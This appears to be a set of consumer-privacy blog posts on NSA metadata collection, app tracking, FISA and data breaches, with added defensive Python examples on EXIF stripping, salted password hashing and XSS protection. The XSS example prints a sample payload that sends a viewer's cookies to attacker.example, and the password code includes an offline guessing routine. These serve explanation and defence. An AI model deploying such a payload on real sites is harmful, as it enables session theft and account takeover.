Supposedly, agencies need a court order to listen to your phone conversations, but the NSA PRISM surveillance program has already been listening to your video conversations via Skype since early in 2011, including conversations where a person at one end uses a conventional telephone.

Second, metadata about your text messages includes:

  • The phone number you sent a text message to
  • When you sent the text message: date and time
  • The phone number of who sent a text message to you
  • When you received a text message: date and time
  • Your phone number
  • Your device information (UDID if a mobile device)
  • Where you sent/received the text message (e.g., geo-location of your mobile device)

Metadata does not include the contents of your text message: what you typed. Remember, your telephone company compiles a detailed record of when and where you are near certain cell towers, because your mobile device constantly seeks the nearest cell tower to make/receive calls or check for voice-mail messages.

Third, metadata about your e-mail messages includes:

  • The e-mail address you sent an e-mail message to
  • When you sent the e-mail message: date and time
  • The e-mail address of somebody who sent an e-mail message to you
  • When you received the e-mail message: date and time
  • Your e-mail address
  • Your device information (UDID if a mobile device)
  • Where you sent/received the e-mail message (e.g., geo-location of your mobile device)

Metadata does not include the contents of your e-mail message: what you typed and the contents of any attachments. This gives you an idea of the extent of the bulk e-mail metadata collection by the NSA, in addition to the bulk phone-call metadata collection -- whether directly, through an intermediary (e.g., your phone company, ISP, or e-mail service), or through the XKeyscore spy program.

NBC News reported this about the legality of collecting your e-mail metadata:

"... emails sent and stored on services such as Gmail seem to fall in between these two legal categories. Is the email content, like a call conversation or a letter sealed in an envelope? Or is it data freely given to a third party? Congress tried to split that baby with the Stored Communications Act back in 1986... it created some situations under which law enforcement officials can peek at any data given to third parties, including email, without needing to show probable cause. This means law enforcement officials are sometimes not required to ask before they barge into your virtual home."

Fourth, metadata about your photographs includes:

  • When you took the photograph: date and time
  • Your device information (e.g., brand, model, UDID if a mobile device)
  • The size of the photograph (e.g., bytes, width in pixels, height in pixels)
  • The format or file type (e.g., *.jpg, *.png)
  • The resolution of the photograph (e.g., pixels per inch)
  • Your information (e.g., your name, e-mail address or user name if the photo is uploaded to a social networking website)
  • Your camera or device information (e.g., make, model, F-stop, exposure, flash mode, zoom setting, lens maker, lens model, serial number, EXIF version)
  • When you edited the photograph: date and time
  • Where you took the photograph (e.g., the geo-location, if you used a mobile device)
  • Any title, comments, and/or caption text you added to the photograph
  • Persons in your photo, if you tagged the photo with names after uploading it to a social networking website

Your video files contain similar metadata elements. Using metadata associated with your photos and videos, they can tell a lot about you without viewing the actual video or photo. Note: social networking websites usually add more metadata to your photographs (and videos) that you upload and store on their service. Why? This makes the data they sell about you more valuable to advertising networks and analytic/tracking companies.

Earlier this year, the International Press Telecommunications Council (IPTC) released the results of a study of images used by social networking websites. Most of those sites edit and delete photographers' metadata from images they host. The IPTC studied 15 social networking websites, and what happened to image metadata during both uploads and downloads. Some of the social networking websites studied: Dropbox, Facebook, Flickr, Google+, Instagram, Pinterest, Twitter, and Tumblr. The IPTC found:

"... Facebook and Flickr are some of the worst offenders, with most of the metadata removed from the original files uploaded. Twitter has also been found to remove Exif and IPTC metadata from its files. Google+, however, passed all of IPTC's tests with flying colours,"

Read the details about the IPTC metadata study. So, the practices of these websites intentionally affect the quality and integrity of your photographs by changing the metadata attached. I'll bet you didn't know that. I'll bet this photo/video metadata tracking gives you a whole new view of social networking sites.
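To make the photo metadata discussed above concrete, here is an added Python example (my own code, not from the post, the IPTC study, or any of the websites named). It parses the EXIF segment of a JPEG, reports the camera make, the timestamp, and the GPS position stored in it, and strips that segment before the file is uploaded anywhere. Because it must run offline, it also assembles a constructed stand-in JPEG whose camera name, date, and coordinates are made-up sample values; the parser handles only the ASCII, SHORT, LONG, and RATIONAL field types and the handful of tags named in the tables, which is enough for the fields the post lists.

```python
import struct
# Tag numbers from the EXIF/TIFF specification: IFD0 tags and the GPS sub-IFD tags.
TAG_NAMES = {0x010F: "Make", 0x0132: "DateTime", 0x8825: "GPSInfo"}
GPS_TAG_NAMES = {0x0001: "GPSLatitudeRef", 0x0002: "GPSLatitude",
                 0x0003: "GPSLongitudeRef", 0x0004: "GPSLongitude"}
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8}  # BYTE, ASCII, SHORT, LONG, RATIONAL

def _read_ifd(tiff, offset, endian, names):
    """Decode one IFD into {tag name: value}: ASCII -> str, SHORT/LONG -> int, RATIONAL -> tuples."""
    out = {}
    (count,) = struct.unpack_from(endian + "H", tiff, offset)
    for i in range(count):
        pos = offset + 2 + 12 * i
        tag, typ, n = struct.unpack_from(endian + "HHI", tiff, pos)
        size = TYPE_SIZES.get(typ, 1) * n
        # Values of four bytes or fewer are stored inline; larger ones live at the given offset.
        data_off = pos + 8 if size <= 4 else struct.unpack_from(endian + "I", tiff, pos + 8)[0]
        raw = tiff[data_off:data_off + size]
        if typ == 2:
            value = raw.split(b"\0", 1)[0].decode("ascii", "replace")
        elif typ == 5:
            nums = struct.unpack(endian + "II" * n, raw)
            value = tuple(zip(nums[0::2], nums[1::2]))
        elif typ in (3, 4):
            vals = struct.unpack(endian + ("H" if typ == 3 else "I") * n, raw)
            value = vals[0] if n == 1 else vals
        else:
            value = raw  # BYTE/UNDEFINED and unknown types are kept as bytes
        out[names.get(tag, hex(tag))] = value
    return out

def _segments(jpeg):
    """Yield (marker, start, end) per JPEG segment; the SOS segment swallows the rest of the file."""
    pos = 2  # skip the SOI marker
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker == 0xDA:  # Start Of Scan: entropy-coded image data follows, not more segments
            yield marker, pos, len(jpeg)
            return
        (length,) = struct.unpack_from(">H", jpeg, pos + 2)  # segment lengths are big-endian
        yield marker, pos, pos + 2 + length
        pos += 2 + length

def _is_exif(jpeg, marker, start):
    return marker == 0xE1 and jpeg[start + 4:start + 10] == b"Exif\0\0"

def _to_degrees(dms, ref):
    """Convert EXIF degrees/minutes/seconds rationals to signed decimal degrees."""
    deg = sum((num / den) / 60 ** i for i, (num, den) in enumerate(dms))
    return -deg if ref in ("S", "W") else deg

def read_exif(jpeg):
    """Return IFD0 tags plus a decoded 'gps' (lat, lon) pair, or {} when the file has no EXIF."""
    for marker, start, end in _segments(jpeg):
        if _is_exif(jpeg, marker, start):
            tiff = jpeg[start + 10:end]
            endian = "<" if tiff[:2] == b"II" else ">"
            (ifd0_off,) = struct.unpack_from(endian + "I", tiff, 4)
            tags = _read_ifd(tiff, ifd0_off, endian, TAG_NAMES)
            if "GPSInfo" in tags:
                gps = _read_ifd(tiff, tags["GPSInfo"], endian, GPS_TAG_NAMES)
                tags["gps"] = (_to_degrees(gps["GPSLatitude"], gps["GPSLatitudeRef"]),
                               _to_degrees(gps["GPSLongitude"], gps["GPSLongitudeRef"]))
            return tags
    return {}

def strip_exif(jpeg):
    """Return a copy of the JPEG without its APP1 EXIF segment; the image data is untouched."""
    out = bytearray(b"\xff\xd8")
    for marker, start, end in _segments(jpeg):
        if not _is_exif(jpeg, marker, start):
            out += jpeg[start:end]
    return bytes(out)

def _pack_ifd(entries, base):
    """Pack a little-endian IFD placed at TIFF offset `base`; out-of-line values follow it."""
    blob_off = base + 2 + 12 * len(entries) + 4
    table, blob = b"", b""
    for tag, typ, data in entries:
        n = len(data) // TYPE_SIZES[typ]
        if len(data) <= 4:
            table += struct.pack("<HHI", tag, typ, n) + data.ljust(4, b"\0")
        else:
            table += struct.pack("<HHII", tag, typ, n, blob_off + len(blob))
            blob += data
    return struct.pack("<H", len(entries)) + table + b"\0\0\0\0" + blob

def build_sample_jpeg():
    """Constructed stand-in for a phone photo: SOI, EXIF APP1 with GPS, a dummy scan, EOI."""
    rational = lambda *pairs: b"".join(struct.pack("<II", a, b) for a, b in pairs)
    ifd0 = lambda gps_off: _pack_ifd([(0x010F, 2, b"ConstructedCam\0"),
                                      (0x0132, 2, b"2013:08:15 12:34:56\0"),
                                      (0x8825, 4, struct.pack("<I", gps_off))], base=8)
    gps_off = 8 + len(ifd0(0))  # the GPS IFD sits right after IFD0 and its string data
    gps = _pack_ifd([(0x0001, 2, b"N\0"), (0x0002, 5, rational((51, 1), (30, 1), (0, 1))),
                     (0x0003, 2, b"W\0"), (0x0004, 5, rational((0, 1), (7, 1), (30, 1)))],
                    base=gps_off)
    tiff = b"II*\0" + struct.pack("<I", 8) + ifd0(gps_off) + gps
    app1 = b"\xff\xe1" + struct.pack(">H", len(tiff) + 8) + b"Exif\0\0" + tiff
    scan = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00" + b"\x12\x34\x56"
    return b"\xff\xd8" + app1 + scan + b"\xff\xd9"
```

`read_exif(build_sample_jpeg())` returns the make, the timestamp, and a `gps` pair of decimal degrees, which is exactly the kind of location record the post warns about; `strip_exif` drops the whole APP1 segment so that nothing in it survives an upload, whatever the receiving site's own stripping policy turns out to be. Real camera files also carry an Exif sub-IFD (tag 0x8769) with exposure and lens details; the same `_read_ifd` routine reads it if you add that tag to the table.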

After reading all of this, several things should be clear. First, metadata is very informative and valuable. It is not benign. Experts have found that metadata is more revealing about you than the content of your telephone conversations. How? By combining your online activity, phone calls, and real-world location. Example: you get a call from your doctor, and five minutes later you do a Google search for "ovarian cancer," and then click through to visit the WebMD website. Twenty minutes later, you call your spouse. After that, your smart phone's GPS history from the telephone company (or your debit card transaction history from your bank) reveals your location at your neighborhood pharmacy. They can easily infer what's happening, even though they did not listen to your actual telephone conversations.

Second, the collection of metadata does not make government surveillance programs any less intrusive. They can learn a lot about you by analyzing only the metadata associated with your online activity. With additional metadata supplied by social networking websites, they can easily learn a lot more.

So, when you hear corporate executives, pundits or politicians claim that there is no problem because they are only collecting metadata, you now know that is misleading and not entirely honest. So, when you hear corporate executives, pundits or politicians claim that there is no problem because they are not reading your email/text messages nor listening to your phone conversations, you now know that, too, is misleading and not entirely honest.

One way to maintain your privacy is to control who has access to the metadata associated with your online activity. To understand the extent of the problem, consumers must demand to know who collects, edits, deletes, saves, and shares (with whom) the metadata associated with your online activity.

I'll bet this gives you a new view of government surveillance programs. As you rush to use cloud services for convenient access by all of your mobile devices, you might pause and consider:

  1. What metadata is attached to the files you have stored in cloud services,
  2. Who controls, edits and deletes the metadata attached to those files,
  3. The companies and governments the cloud service shares your files' metadata with, and
  4. If the privacy and terms of use policies of your cloud service answer items #1 through #3.

Experts have warned that the massive NSA government spying program could cost U.S.-based cloud-services vendors $35 billion in lost revenues, as customers seek alternatives. Despite the claims of pro-surveillance politicians and government officials, broad surveillance of all citizens has its direct costs.

Were these pro-surveillance people so arrogant (or myopic) that they assumed there wouldn't be consequences to American businesses? Or do they just not care? One could make a good argument that this broad surveillance has jeopardized America's leadership in developing, utilizing, and innovating the Internet, as users look for substitutes to products and services by American Internet and high-tech companies. The surveillance has also damaged the trust by America's allies.


More Consequences, And Abuse, From Broad Government Surveillance Programs

There is a very interesting article at the C/Net website. Some selected, very interesting comments and questions:

"If you're a security researcher at a large cloud company, you have to include the NSA on your list of threats that you have to protect against..."

"The FBI has a unit now that does nothing but hack into people's computers, extract documents, control Webcams... The FBI's role as an offensive cyber actor significantly undermines their cause. How can an agency warn people about malware when it's using malware itself?"

"Even if [the NSA] stood up tomorrow and said that [they] have eliminated these programs... How could we believe them? How can we believe that anything they say is true?"

"The issue with balancing privacy and surveillance is that the wireless carriers are not interested in privacy..."

"Even if you trust the NSA 100 percent that they're going to use [your data] correctly... Do you trust that they're going to be able to keep it safe from hackers? What if somebody gets that database and posts it online?"

Speaking of protecting and using the collected data correctly (or abusing it), Reuters reporters have uncovered a secret government program where data collected by the NSA, supposedly about only non-U.S. citizens, is used by several other government agencies (e.g., CIA, DHS, FBI, and IRS) to secretly prosecute American citizens:

“A secretive U.S. Drug Enforcement Administration unit is funneling information from intelligence intercepts, wiretaps, informants and a massive database of telephone records to authorities across the nation to help them launch criminal investigations of Americans... The undated documents show that federal agents are trained to "recreate" the investigative trail to effectively cover up where the information originated, a practice that some experts say violates a defendant's Constitutional right to a fair trial. If defendants don't know how an investigation began, they cannot know to ask to review potential sources of exculpatory evidence - information that could reveal entrapment, mistakes or biased witnesses.”

So, we now know that the Special Operations Division within the DEA uses data collected by the NSA.

And, experts warn that the massive NSA government spying program could cost U.S.-based cloud-services vendors $35 billion in lost revenues. Lost revenues equals lost J-O-B-S here in the USA. Is the Federal government and Congress ready to explain that? I think not.


Researchers Demonstrate That Products With Embedded Computers Can Be Hacked And Need Stronger Protections

With the digital revolution, computers are now a part of many products and items. Some of these things you are aware of. Others, you might not be aware of:

  • In June, a group of researchers, including students at the University of Texas at Austin, created fake GPS signals to steer an $80 million yacht off course. During this experiment, the yacht was sailing in international waters off the coast of Italy.
  • Funded by DARPA, engineers penetrated the systems in a Ford Escape to disable the car's brakes, engage the brakes at high speed, spoof the GPS, disable the power steering, and perform other nasty hacks. This was not a driverless car, but a standard-issue car built by Ford Motor Company.
  • Other hackers found vulnerabilities in digital television sets, which allowed hackers to remotely take over the camera in the devices.

All of this hacking was done to highlight the vulnerabilities, and to encourage manufacturers to build better data security into their products. Forbes magazine reported:

"Practically every American carmaker now offers a cellular service or Wi-Fi network like General Motors’ OnStar, Toyota’s Safety Connect and Ford’s SYNC. Mobile-industry trade group the GSMA estimates revenue from wireless devices in cars at $2.5 billion today and projects that number will grow tenfold by 2025. Without better security it’s all potentially vulnerable, and automakers are remaining mum or downplaying the issue."

So, just like spammers currently "spoof" or create fake e-mail addresses, criminals and identity thieves can create fake GPS signals to fool any GPS-enabled mobile device. If engineers and researchers can do these nasty hacks, so too can real criminals and identity thieves.

When these types of hacks happen, there is no alarm or signal that the device is being or has been hacked.

The bottom line: a computer is a computer, regardless of the device or product that contains one. And, that computer (or WiFi server) can be hacked by criminals just like your laptop, desktop, tablet, and smart phone can be hacked. A wise consumer will:

  1. Understand before purchase the data security built into a manufacturer's product
  2. Read before a purchase the privacy policy that is included with the product
  3. After purchase, install and maintain any anti-virus software to protect the product

83% Of The Leading Mobile Apps Put Your Sensitive Personal Information At Risk

On July 30, Appthority released a report about the risks with mobile apps. The report included a study of the 400 leading apps across the Apple iOS and Google Android platforms. The study included the 100 leading free apps and the 100 leading paid apps from both platforms.

Since there are more than a million apps in the Apple App Store and in Google Play, there is stiff competition among app developers. As a result, many app developers increase their revenues by selling mobile users' information to both advertising networks and analytic/tracking companies. Developers of both free and paid apps do this.

Key findings from the study:

"Overall, 83% of the most popular apps are associated with security risks and privacy issues.

iOS apps exhibited more risky behaviors than Android apps overall. 91% of iOS apps exhibit at least one risky behavior, as compared to 80% of Android apps.

95% of the top free apps and 78% of the top paid apps exhibited at least one risky behavior.

78% of the most popular free Android apps identify the user’s ID (UDID).

Even though Apple prohibits its developers from accessing the UDID, 6% of the tested iOS apps still do.

72% of the top free apps track for the user’s location, compared to 41% of paid apps.

Although paid apps already generate revenue when downloaded, 59% of paid iOS and 24% of paid Android apps still support in-app purchasing. Furthermore, 39% of paid iOS and 16% of paid Android apps still share data"

The UDID is a bonanza for companies, marketers, analytics/tracking companies, advertising networks, and any entity interested in tracking consumers. When matched with your 10-digit phone number and App Store account, the UDID is a powerful identification (and tracking) tool that allows the compilation of all data, usage, and information on a mobile device to a person: phone calls, email messages, photos, video, text messages, GPS position, phone book, web browser history, apps downloaded, music, movies, and more. That compilation is more extensive since many consumers now use multiple email addresses (e.g., work and personal) on a single mobile device.

While both types of apps expose you to risky behavior, the researchers found that free apps are riskier than paid apps:

"The biggest disparity between free and paid apps is location tracking. While 73% of free apps track for location, less than half of paid apps (41%) do the same. Free apps are also more likely than paid apps to use single sign-on (67%), share data with ad networks and analytics (51%), offer in-app purchasing (50%), identify the user or UDID (44%), access the address book or contact list (42%), and access the calendar (15%). Paid apps, on the other hand, aren’t as safe as one might think..."

So, using only paid apps is not a security solution for consumers. The researchers also found that Apple iOS apps exhibited more risky behavior than Android apps:

"... 91% of iOS apps exhibit at least one risky behavior, as compared to 80% of Android apps. Of the 200 iOS apps Appthority tested (100 free, 100 paid), 62% tracked for location, 56% used single sign-on, 59% offered in-app purchasing, 43% shared data with ad networks or analytics companies, 39% accessed the address book or contact list, and 20% accessed the calendar..."

So, assuming that Apple iOS apps are safe is not a good security solution for consumers. Many apps track your GPS location needlessly. That is, the app doesn't need your geo-location to operate, but it collects it anyway so the developer can sell more data to advertising networks and analytics/tracking companies. And the apps won't always tell you they are doing this:

"In some cases, developers are paid based on the amount of data they collect and share about users. Have you ever noticed an app that’s constantly running in the background (that really has no need to)? It’s possible that it’s tracking your location and sharing it with outside parties for advertising purposes. App developers will often ask for these types of permissions upfront, but unfortunately that’s not always the case; or, the language they use is intentionally deceptive."

Plus, these apps that constantly collect and report your geo-location will consume more of your valuable data plan minutes, since many telecommunications providers have eliminated the unlimited data plan option. Some of the companies that built the leading Apple iOS apps:

"Disney dominated the market share of popular iOS apps (10 apps), followed by Electronic Arts (5), Apple (4), George CL (4) and Rovio Entertainment (makers of Angry Birds) (4). There were 79 different developers in the top 100 paid iOS apps... From the top 100 free iOS apps, there were 81 different developers... "

Some of the companies that built the leading Android apps:

"... Electronic Arts led the pack (5 apps), followed by Disney (4), Gameloft (4), Google (4) and Chainfire (3). There were 88 different developers in the top 100 paid Android apps... With the top 100 free Android apps, there were 85 different developers..."

Most of these apps are games, followed by social networking apps, music apps, and utilities:

"... gaming apps exhibited more risky behaviors across all categories, with the exception of accessing the address book or contact list. More than twice as many gaming apps (68%) supported in-app purchasing, as compared to non-gaming apps. Also, interestingly enough, gaming apps and non-gaming apps showed the same level for location tracking (57%)... 56% used single sign-on, 51% shared data with analytics or ad networks, 43% identified the user (UDID), 27% accessed the address book or contact list, and 13% accessed the calendar..."

The complete report lists the apps studied by type (e.g., free, paid), by platform (e.g., Apple iOS, Android), and by name.

Since many consumers use their mobile devices for both work and personal activity, some IT departments might be tempted to block or ban gaming apps as a data security policy. The researchers advise against this, because not all gaming apps are risky, and not all apps in other categories (e.g., social networking, music, utilities) are safe. Plus, most employees will resent and resist being told what apps they cannot download onto their personal devices.

While the Apple iOS platform seems safer than the Google Android platform, the Apple iOS apps are riskier. So, brand loyalty isn't necessarily a good data security strategy.

In my view, using mobile apps today is like the wild west frontier of the 1800s. Anything goes. Past studies have documented the lack of privacy policies with too many mobile apps. In some instances, class-action lawsuits have been a remedy to abuses for consumers. Some states' attorneys general have cracked down on apps that abuse consumers' sensitive personal data.

Download the complete App Reputation Report by Appthority.


The FISA Court, Justice Department, XKeyscore, And Your Online Passwords

Three related items in today's post. First, a Center For Democracy and Technology article discussed a newly disclosed letter that described the relationship between the FISA Court and the Department of Justice (DOJ). The relationship is closer than one might expect, and the letter documents how the two entities collaborate.

Before applying for surveillance under FISA Court rules, the Department of Justice:

"... sends a draft of the application for FISA surveillance to a clerk at the FISA Court; the FISA Court’s clerk sends back comments; DOJ sends another draft or a final application for a surveillance order; the FISA Court clerk prepares a bench memo on the application; and the FISA Court judge on duty decides whether to authorize the surveillance based on the application, bench memo and the government’s unopposed presentation at any hearing the judge may convene. As part of this process, FISA Court clerks and DOJ lawyers have conversations daily about FISA surveillance applications, and they get together for meetings approximately weekly depending on the caseload..."

Are the skills of the DOJ staff so weak that they need help from the FISA Court to write appropriate surveillance applications? Why this level of collaboration is troublesome:

"... in the criminal context, a specific person is wiretapped to obtain evidence about a specific crime, and whether that evidence was obtained lawfully and constitutionally is tested in a fully adversarial proceeding when that person is charged with the crime. There is no such after-the-fact check on FISA surveillance. Any adversarial testing of that surveillance has to occur up front, when the FISA Court is deciding whether to authorize it."

Given this cozy collaboration, it is no surprise that the FISA Court has rejected only 11 of 33,900 requests by the DOJ since 1979. That is a rejection rate of 0.03 percent, or 0.0003. That doesn't seem like oversight to me. That seems like a rubber stamp -- and a broken one, too.

Browse the number and type of DOJ applications and FISA approvals since 1979. Read part one about how the FISA Court undermines the public's trust.

Today's second item: several news outlets reported that the U.S. government has asked Internet firms to turn over users' passwords in bulk. Internet service providers (ISPs), social networking sites (e.g., Facebook), communications services (e.g., Skype), online stores (e.g., Amazon), and most other websites do not keep the password itself. Good practice is to store only a one-way hash of the password, computed with a per-user random salt, and that is why the reports describe the requests in terms of "passwords, salts, or algorithms" rather than passwords alone. A hash cannot be decrypted, but a party holding the hash, the salt, and the algorithm can run guesses offline until one matches. A recovered password gives access to private, confidential correspondence, and lets the holder log in and impersonate the user:

"A Microsoft spokesperson would not say whether the company has received such requests from the government. But when asked whether Microsoft would divulge passwords, salts, or algorithms, the spokesperson replied: "No, we don't, and we can't see a circumstance in which we would provide it." Google also declined to disclose whether it had received requests for those types of data. But a spokesperson said the company has "never" turned over a user's encrypted password... A Yahoo spokeswoman would not say whether the company had received such requests... Apple, Facebook, AOL, Verizon, AT&T, Time Warner Cable, and Comcast did not respond to queries about whether they have received requests for users' passwords and how they would respond to them... The FBI declined to comment."
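To make concrete what a site actually holds when it stores passwords properly, and what "passwords, salts, or algorithms" would let a recipient do, here is an added example in Python. It is not code from Microsoft, Google, or any other company named in the article; the record format, iteration count, and sample passwords are assumptions chosen for illustration.

```python
# Added example (not from the article or any provider named in it): how a site
# that stores salted, iterated hashes holds passwords, and what a party holding
# the record, salt and algorithm can still do with it. Record format, iteration
# count and the sample passwords are assumptions chosen for illustration.
import hashlib
import hmac
import os
from typing import Iterable, Optional

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 100_000  # assumed work factor; raise it as hardware gets faster


def make_record(password: str, salt: Optional[bytes] = None) -> str:
    """Return the string a site would store instead of the password.

    The password itself never appears in the record; only a per-user random
    salt and the PBKDF2-HMAC-SHA256 digest derived from password + salt.
    """
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"{ALGORITHM}${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify(password: str, record: str) -> bool:
    """Recompute the digest from the stored salt and compare in constant time."""
    algorithm, iterations, salt_hex, digest_hex = record.split("$")
    if algorithm != ALGORITHM:
        raise ValueError(f"unsupported record type: {algorithm}")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def offline_guess(record: str, candidates: Iterable[str]) -> Optional[str]:
    """What a party holding the record (salt and algorithm included) can do.

    There is nothing to decrypt: the only route back to the password is to
    try candidates one at a time, paying ITERATIONS hash computations each.
    """
    for candidate in candidates:
        if verify(candidate, record):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed sample with a fixed salt so the output is reproducible.
    record = make_record("correct horse battery staple", salt=bytes(range(16)))
    print(record)
    print(verify("correct horse battery staple", record))  # True
    print(offline_guess(record, ["123456", "password", "letmein"]))  # None
```

The point of the salt and the iteration count is visible in `offline_guess`: the same guess list has to be re-run per user, and each guess costs a full PBKDF2 computation, so a weak or reused password is the only thing that makes a handed-over record useful.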

This is the government's surveillance agencies (e.g., NSA, FBI) collecting information about everyone, and about what everyone does online, regardless of whether you have committed a crime. This troubles me greatly, and I hope that it troubles you, too. Encrypting your online information, or using an encryption service (e.g., a VPN), does not make you suspicious. There are lots of reasons to encrypt your online activity. Example: it is wise data security to use a VPN and encrypt your online sessions when connected at a public WiFi hotspot. Example: as a user experience and information architecture consultant, I have to protect my clients' sensitive assets.

This is not small government. This broad, encompassing data collection is an over-reach by our government: collecting all online data about everyone, without limiting collection to people who have committed crimes, or to persons under suspicion of criminal activity named in clearly articulated, valid, bounded, court-approved orders.

Today's third item: the Guardian UK reported about another US government surveillance program:

"A top secret National Security Agency program allows analysts to search with no prior authorization through vast databases containing emails, online chats and the browsing histories of millions of individuals... The NSA boasts in training materials that the program, called XKeyscore, is its "widest-reaching" system for developing intelligence from the internet."

Reportedly, all an NSA analyst needs is a person's email address to search the data collected by XKeyscore:

"... training materials for XKeyscore detail how analysts can use it and other systems to mine enormous agency databases by filling in a simple on-screen form giving only a broad justification for the search. The request is not reviewed by a court or any NSA personnel before it is processed..."

This XKeyscore system seems ripe for abuse. Looking at all three items, we have a secret court, secret laws, secret processes, and secret operations. On top of all this secrecy, our elected officials in U.S. Congress knew about it, voted for it, and did not inform the public whom they took an oath to serve.

Overall, there are two over-arching issues:

  1. Trust
  2. 4th Amendment of the U.S. Constitution

It is impossible for "We, the People" to hold accountable a secret court with secret laws and secret processes. Also, lies break the public's trust. When a government fails to honestly, accurately, and fully inform the voting public (i.e., We, the People) about secret courts, laws, and processes, it breaks the public's trust. Perhaps more importantly, a government can't simply ignore or walk away from the Fourth Amendment of the U.S. Constitution:

"The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized."

Write to your elected officials today. Learn more about government surveillance programs.


A Tale Of Two Data Breaches. Transparency Matters

Yesterday, Michael Lee wrote a good ZDNet article contrasting the post-breach responses of two companies: Canonical and Apple. Both companies experienced data breaches, but responded in very different ways.

Canonical operates the Ubuntu Forums, and:

"In its latest announcement, Canonical broke down its understanding of how it believes it had been breached... with a moderator account used to post an announcement on the forum. The announcement itself is believed to have contained a cross-site scripting (XSS) attack, designed to steal the login session information from the victim's browser cookie. The compromised moderator account was then used to message three of the boards' administrators, allowing the attacker to hijack an administrator's login session. Once armed with the administrator's privileges, the attacker then inserted a "hook" in the vBulletin web-forum software to allow them to execute arbitrary code..."

Compare that to this:

"... Apple, in contrast, is still having difficulty in bringing its services back online after its Developer services suffered a security breach on the very same weekend. Despite stating that it was informing customers of the breach "in the spirit of transparency", it has not revealed any information on how the attackers attempted their intrusion. Initially, the company took down its developer centre for two days for no apparent reason, telling users that it was "undergoing maintenance for an extended period". Users later began to suspect foul play when they received unauthorised password reset emails. Apple has managed to bring more of its services back online today..."

Transparency matters and consumers expect open, honest, and direct communications.
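The Ubuntu Forums chain quoted above depends on two things: a post body being rendered as live HTML in the moderators' browsers, and the session cookie being readable by script once that HTML runs. As an added example, not code from Canonical, vBulletin, Apple, or the ZDNet article, here are the two controls that address each step, in Python. The cookie name, its attributes, and the sample payload are assumptions constructed for this example.

```python
# Added example (not Canonical's, vBulletin's or Apple's code): the two
# controls that break the forum attack chain. Output escaping keeps a post
# body from becoming script in a viewer's browser, and the HttpOnly flag keeps
# any script that does run from reading the session cookie. The cookie name,
# attributes and sample payload are assumptions constructed for this example.
import html

SESSION_COOKIE = "forum_session"  # assumed cookie name


def render_post(body: str) -> str:
    """Place user-supplied post text into HTML with every metacharacter escaped."""
    return f'<div class="post">{html.escape(body, quote=True)}</div>'


def session_cookie_header(token: str) -> str:
    """Build the Set-Cookie value for a new login session.

    HttpOnly stops document.cookie from exposing the token to injected script;
    Secure keeps it off plaintext HTTP; SameSite=Lax limits cross-site sends.
    """
    return f"{SESSION_COOKIE}={token}; Path=/; Secure; HttpOnly; SameSite=Lax"


def cookie_attributes(set_cookie: str) -> dict:
    """Parse the attribute list of a Set-Cookie value (names lower-cased)."""
    parts = [p.strip() for p in set_cookie.split(";")]
    attrs = {}
    for part in parts[1:]:
        name, _, value = part.partition("=")
        attrs[name.strip().lower()] = value.strip() or True
    return attrs


def cookie_is_hardened(set_cookie: str) -> bool:
    """True when the session cookie carries both HttpOnly and Secure."""
    attrs = cookie_attributes(set_cookie)
    return "httponly" in attrs and "secure" in attrs


if __name__ == "__main__":
    # Constructed payload of the kind the article describes: script that ships
    # the viewer's cookies to a host the attacker controls.
    payload = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
    print(render_post(payload))
    print(cookie_is_hardened(session_cookie_header("abc123")))  # True
    print(cookie_is_hardened("forum_session=abc123; Path=/"))  # False
```

`cookie_is_hardened` is the check worth running against a site's actual login response: if the session cookie comes back without HttpOnly, a single stored XSS anywhere on the forum is enough to hand an attacker an administrator's session, which is exactly the escalation the quoted account describes.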